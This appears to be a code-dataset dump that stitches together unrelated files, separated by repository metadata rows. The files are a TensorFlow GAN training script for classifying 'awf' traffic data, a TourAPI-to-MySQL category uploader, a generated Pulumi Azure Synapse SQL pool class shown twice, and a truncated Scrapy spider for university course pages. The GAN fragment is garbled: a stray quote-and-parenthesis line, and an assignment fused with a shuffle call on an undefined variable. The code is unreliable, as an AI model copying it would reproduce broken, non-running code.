tf.summary.scalar("ClassificationAccuracyTrain", train_accuracy_op),
tf.summary.scalar("ClassificationAccuracyTest", test_accuracy_op)])
writer = tf.summary.FileWriter(_next_logdir("tensorboard/wfi5_cw"))
print("Run training...")
steps_per_epoch = (len(train_x_labeled_data) + len(
train_x_unlabeled_data)) // args.batch_size
steps_per_test = test_x_data.shape[0] // args.batch_size
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
step = 0
for epoch in range(args.train_epochs):
losses_d, losses_g, accuracies = [], [], []
print("Epoch {}".format(epoch))
pbar = tqdm.trange(steps_per_epoch)
sess.run(iterator_labeled.initializer,
feed_dict={labeled_X: train_x_labeled_data, labeled_y: train_y_labeled_data})
sess.run(iterator_unlabeled.initializer,
feed_dict={unlabeled_X: train_x_unlabeled_data, unlabeled_y: train_y_unlabeled_data,
unlabeled_X2: train_x_unlabeled2_data, unlabeled_y2: train_y_unlabeled2_data})
sess.run(iterator_test.initializer, feed_dict={test_X: test_x_data, test_y: test_y_data})
for _ in pbar:
if step % 1000 == 0:
_, loss_g_batch, loss_d_batch, summ, accuracy_batch = sess.run(
[train_op, loss_g, loss_d, summary_op, train_accuracy_op])
writer.add_summary(summ, global_step=step)
else:
_, loss_g_batch, loss_d_batch, accuracy_batch = sess.run(
[train_op, loss_g, loss_d, train_accuracy_op])
pbar.set_description("Discriminator loss {0:.3f}, Generator loss {1:.3f}"
.format(loss_d_batch, loss_g_batch))
losses_d.append(loss_d_batch)
losses_g.append(loss_g_batch)
accuracies.append(accuracy_batch)
step += 1
print("Discriminator loss: {0:.4f}, Generator loss: {1:.4f}, "
"Train accuracy: {2:.4f}"
.format(np.mean(losses_d), np.mean(losses_g), np.mean(accuracies)))
accuracies = [sess.run(test_accuracy_op) for _ in range(steps_per_test)]
if np.mean (accuracies) > best_acc:
best_acc = np.mean (accuracies)
if epoch == (int(args.train_epochs)-1):
print ("Test accuracy: {0:.4f}".format (np.mean (accuracies)))
print ("Best accuracy: {0:.4f}".format (best_acc))
def define_noise(batch_size_tensor, args):
with tf.name_scope("LatentNoiseVector"):
z = tfd.Normal(loc=0.0, scale=args.stddev).sample(
sample_shape=(batch_size_tensor, args.z_dim_size))
z_perturbed = z + tfd.Normal(loc=0.0, scale=args.stddev).sample(
sample_shape=(batch_size_tensor, args.z_dim_size)) * 1e-5
return z, z_perturbed
def split_awf_closed(r_train, r_test, nClass, mon_instance, unmon_instance, dim):
mon_data = np.load(HOME+'/datasets/awf1.npz', allow_pickle=True)
mon_x = mon_data['feature']
',unmon_instance)
num_mtrain_instance = mon_instance * (r_train / (r_train + r_test)) np.random.shuffle(mon_random)
mon_train_ins = mon_random[:int(num_mtrain_instance)]
mon_test_ins = mon_random[int(num_mtrain_instance):]
print('mon_test_ins', len(mon_test_ins))
train_feature = np.zeros((nClass*len(mon_train_ins), dim), dtype=int)
test_feature = np.zeros((nClass*len(mon_test_ins),dim), dtype=int)
print('test_feature', len(test_feature))
train_label = np.zeros((nClass*len(mon_train_ins),), dtype=int)
test_label = np.zeros((nClass*len(mon_test_ins),), dtype=int)
print(len(mon_train_ins))
print(len(mon_test_ins))
i = 0
mon_instance = int(mon_instance)
print('Monitored training set partitioning...')
print(nClass)
print(len(mon_train_ins))
for c in range(nClass):
c=int(c)
print(c)
for instance in mon_train_ins:
train_label[i] = c
train_feature[i] = mon_x[(c*mon_instance)+instance][:dim]
i += 1
print(i)
print('Monitored testing set partitioning...')
j = 0
for c in range(nClass):
c = int(c)
for instance in mon_test_ins:
test_label[j]=c
test_feature[j]=mon_x[(c*mon_instance)+instance][:dim]
j += 1
print(j)
print(j)
print('train_feature: ', len(train_feature))
print('train_label: ', len(train_label))
print('test_feature: ', len(test_feature))
print('test_label: ', len(test_label))
print('train_dim: ', len(train_feature[0]))
print('test_dim: ', len(test_feature[0]))
return train_feature, train_label, test_feature, test_label
def _next_logdir(path):
if not os.path.exists(path):
os.makedirs(path)
subdirs = [d for d in os.listdir(path) if opth.isdir(opth.join(path, d))]
logdir = opth.join(path, "run" + str(len(subdirs)).zfill(4))
if not os.path.exists(logdir):
os.makedirs(logdir)
return logdir
if __name__ == "__main__":
parser.add_argument ('--batch_size', required=False, default=32)
parser.add_argument ('--train_epochs', required=False, default=12)
parser.add_argument ('--lr', required=False, default=2e-4)
parser.add_argument ('--stddev', required=False, default=1e-2)
parser.add_argument ('--num_classes', required=False, default=100)
parser.add_argument ('--z_dim_size', required=False, default=100)
parser.add_argument ('--num_labeled_examples', required=False, default=5)
parser.add_argument ('--man_reg', required=False, default=True)
args = parser.parse_args ()
for i in range(5):
main(args)
| true | true |
7900e6e2df9688e62efaff5a46a81c06f7b852d3 | 1,359 | py | Python | 02_category_code.py | darkbright/TourAPI | 788d2973a964db073889c2a2443d6beaa8e38c87 | [
"MIT"
] | null | null | null | 02_category_code.py | darkbright/TourAPI | 788d2973a964db073889c2a2443d6beaa8e38c87 | [
"MIT"
] | null | null | null | 02_category_code.py | darkbright/TourAPI | 788d2973a964db073889c2a2443d6beaa8e38c87 | [
"MIT"
] | null | null | null | from tourapi.list import TourAPI
from tourapi.config import ServiceKey, MobileOS, MobileApp, Languages
from mysql_config import MysqlHost, MysqlUser, MysqlPass, MysqlDB
import pymysql
import json
def upload_category_codes(codes, language="Kor", level=0, cat1="", cat2="", cat3=""):
global conn, curs
query = """
INSERT INTO category_code (code, cat1, cat2, cat3, level, name_{0}) VALUES (%s, %s, %s, %s, %s, %s)
ON DUPLICATE KEY UPDATE name_{0}=%s
""".format(language.lower())
for code in codes:
curs.execute(query, (code["code"], cat1, cat2, cat3, level, code["name"], code["name"]))
# print(code["name"], code["code"])
conn.commit()
return
conn = pymysql.connect(host = MysqlHost, user = MysqlUser, password = MysqlPass, db = MysqlDB)
curs = conn.cursor()
for lan in Languages:
language = lan["code"]
api = TourAPI(ServiceKey, language)
# 대분류 카테고리
cat1_codes = api.list_category_code()
upload_category_codes(cat1_codes, language, 1)
for cat1 in cat1_codes:
cat2_codes = api.list_category_code(cat1["code"])
upload_category_codes(cat2_codes, language, 2, cat1["code"])
print(cat2_codes)
for cat2 in cat2_codes:
cat3_codes = api.list_category_code(cat1["code"], cat2["code"])
upload_category_codes(cat3_codes, language, 3, cat1["code"], cat2["code"])
conn.commit()
conn.close() | 30.2 | 101 | 0.693893 | from tourapi.list import TourAPI
from tourapi.config import ServiceKey, MobileOS, MobileApp, Languages
from mysql_config import MysqlHost, MysqlUser, MysqlPass, MysqlDB
import pymysql
import json
def upload_category_codes(codes, language="Kor", level=0, cat1="", cat2="", cat3=""):
global conn, curs
query = """
INSERT INTO category_code (code, cat1, cat2, cat3, level, name_{0}) VALUES (%s, %s, %s, %s, %s, %s)
ON DUPLICATE KEY UPDATE name_{0}=%s
""".format(language.lower())
for code in codes:
curs.execute(query, (code["code"], cat1, cat2, cat3, level, code["name"], code["name"]))
conn.commit()
return
conn = pymysql.connect(host = MysqlHost, user = MysqlUser, password = MysqlPass, db = MysqlDB)
curs = conn.cursor()
for lan in Languages:
language = lan["code"]
api = TourAPI(ServiceKey, language)
cat1_codes = api.list_category_code()
upload_category_codes(cat1_codes, language, 1)
for cat1 in cat1_codes:
cat2_codes = api.list_category_code(cat1["code"])
upload_category_codes(cat2_codes, language, 2, cat1["code"])
print(cat2_codes)
for cat2 in cat2_codes:
cat3_codes = api.list_category_code(cat1["code"], cat2["code"])
upload_category_codes(cat3_codes, language, 3, cat1["code"], cat2["code"])
conn.commit()
conn.close() | true | true |
7900e764e5405f4daa5115b4afcb175efd0c2b01 | 13,465 | py | Python | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlPoolsV3Args', 'SqlPoolsV3']
@pulumi.input_type
class SqlPoolsV3Args:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['SkuArgs']] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a SqlPoolsV3 resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input['SkuArgs'] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
:param pulumi.Input[str] sql_pool_name: The name of the sql pool.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if location is not None:
pulumi.set(__self__, "location", location)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if sql_pool_name is not None:
pulumi.set(__self__, "sql_pool_name", sql_pool_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
"""
The name of the workspace.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
"""
The sql pool SKU. The list of SKUs may vary by region and support offer.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="sqlPoolName")
def sql_pool_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the sql pool.
"""
return pulumi.get(self, "sql_pool_name")
@sql_pool_name.setter
def sql_pool_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_pool_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class SqlPoolsV3(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A sql pool resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[pulumi.InputType['SkuArgs']] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
:param pulumi.Input[str] sql_pool_name: The name of the sql pool.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] workspace_name: The name of the workspace.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlPoolsV3Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A sql pool resource.
:param str resource_name: The name of the resource.
:param SqlPoolsV3Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlPoolsV3Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["sql_pool_name"] = sql_pool_name
__props__.__dict__["tags"] = tags
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20200401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:SqlPoolsV3")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlPoolsV3, __self__).__init__(
'azure-native:synapse/v20200401preview:SqlPoolsV3',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlPoolsV3':
"""
Get an existing SqlPoolsV3 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return SqlPoolsV3(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="currentServiceObjectiveName")
def current_service_objective_name(self) -> pulumi.Output[str]:
"""
The current service level objective name of the sql pool.
"""
return pulumi.get(self, "current_service_objective_name")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of SqlPool.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="requestedServiceObjectiveName")
def requested_service_objective_name(self) -> pulumi.Output[str]:
"""
The requested service level objective name of the sql pool.
"""
return pulumi.get(self, "requested_service_objective_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
"""
The sql pool SKU. The list of SKUs may vary by region and support offer.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter(name="sqlPoolGuid")
def sql_pool_guid(self) -> pulumi.Output[str]:
"""
The Guid of the sql pool.
"""
return pulumi.get(self, "sql_pool_guid")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of the sql pool.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
SystemData of SqlPool.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
| 41.303681 | 789 | 0.637653 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlPoolsV3Args', 'SqlPoolsV3']
@pulumi.input_type
class SqlPoolsV3Args:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['SkuArgs']] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if location is not None:
pulumi.set(__self__, "location", location)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if sql_pool_name is not None:
pulumi.set(__self__, "sql_pool_name", sql_pool_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="sqlPoolName")
def sql_pool_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "sql_pool_name")
@sql_pool_name.setter
def sql_pool_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_pool_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class SqlPoolsV3(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlPoolsV3Args,
opts: Optional[pulumi.ResourceOptions] = None):
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlPoolsV3Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["sql_pool_name"] = sql_pool_name
__props__.__dict__["tags"] = tags
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20200401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:SqlPoolsV3")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlPoolsV3, __self__).__init__(
'azure-native:synapse/v20200401preview:SqlPoolsV3',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlPoolsV3':
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return SqlPoolsV3(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="currentServiceObjectiveName")
def current_service_objective_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "current_service_objective_name")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="requestedServiceObjectiveName")
def requested_service_objective_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "requested_service_objective_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
return pulumi.get(self, "sku")
@property
@pulumi.getter(name="sqlPoolGuid")
def sql_pool_guid(self) -> pulumi.Output[str]:
return pulumi.get(self, "sql_pool_guid")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
return pulumi.get(self, "type")
| true | true |
7900e8133f18db39491de69fa88236e8659bfe45 | 3,358 | py | Python | UW_Madison/UW_Madison/spiders/uw_madison_courses3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Madison/UW_Madison/spiders/uw_madison_courses3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Madison/UW_Madison/spiders/uw_madison_courses3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from UW_Madison.items import UwMadisonItem
class Madison_courses( CrawlSpider ):
name = 'uw_madison5'
allowed_domains = ['wisc.edu']
start_urls = [
"http://guide.wisc.edu/courses/",
]
rules = (
Rule( LinkExtractor( allow = ( r'ttp://guide.wisc.edu/courses/' )),
callback = 'parse_httpbin',
follow = True
),
)
'''
def start_requests( self ):
for u in self.start_urls:
yield scrapy.Request( u, callback = self.parse_httpbin,
errback = self.errback_httpbin,
dont_filter = True )
'''
def parse_httpbin( self, response ):
#self.logger.info("Got successful response {}".format(response.url) )
items = UwMadisonItem()
course = response.css('span.courseblockcode::text').extract()
#course = response.css('span.courseblockcode::text').extract_first()
title = response.css('div.sc_sccoursedescs > div.courseblock > p.courseblocktitle > strong::text').extract()
#title = response.css('div.sc_sccoursedescs > div.courseblock > p.courseblocktitle > strong::text').extract_first()
unit = response.css('.courseblockcredits::text').extract()
#unit = response.css('.courseblockcredits::text').extract_first()
description = response.css('.courseblockdesc::text').extract()
#description = response.css('.courseblockdesc::text').extract_first()
prerequisites = response.css('p.courseblockextra.noindent.clearfix > span.cbextra-data > .bubblelink::text').extract()
#prerequisites = response.css('p.courseblockextra.noindent.clearfix > span.cbextra-data > .bubblelink::text').extract_first()
items['course'] = course
items['title'] = title
items['unit'] = unit
items['description'] = description
items['prerequisites'] = prerequisites
yield items
'''
def errback_httpbin( self, failure):
# log all failures
self.logger.error(repr(failure))
# in case you want to do something special for some errors,
# you may need the failure's type:
if failure.check(HttpError):
# These exception come from HttpError spider middleware
# you can get the non-200 response
response = failure.value.response
self.logger.error("HttpError on %s", response.url )
elif failure.check(DNSLookupError):
# This is the original request
request = failure.request
self.logger.error('DNSLookupError on %s', request.url )
elif failure.check(TimeoutError, TCPTimeOutError ):
request = failure.request
self.logger.error('TimeoutError on %s', request.url)
'''
| 29.2 | 133 | 0.638177 | from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from UW_Madison.items import UwMadisonItem
class Madison_courses( CrawlSpider ):
name = 'uw_madison5'
allowed_domains = ['wisc.edu']
start_urls = [
"http://guide.wisc.edu/courses/",
]
rules = (
Rule( LinkExtractor( allow = ( r'ttp://guide.wisc.edu/courses/' )),
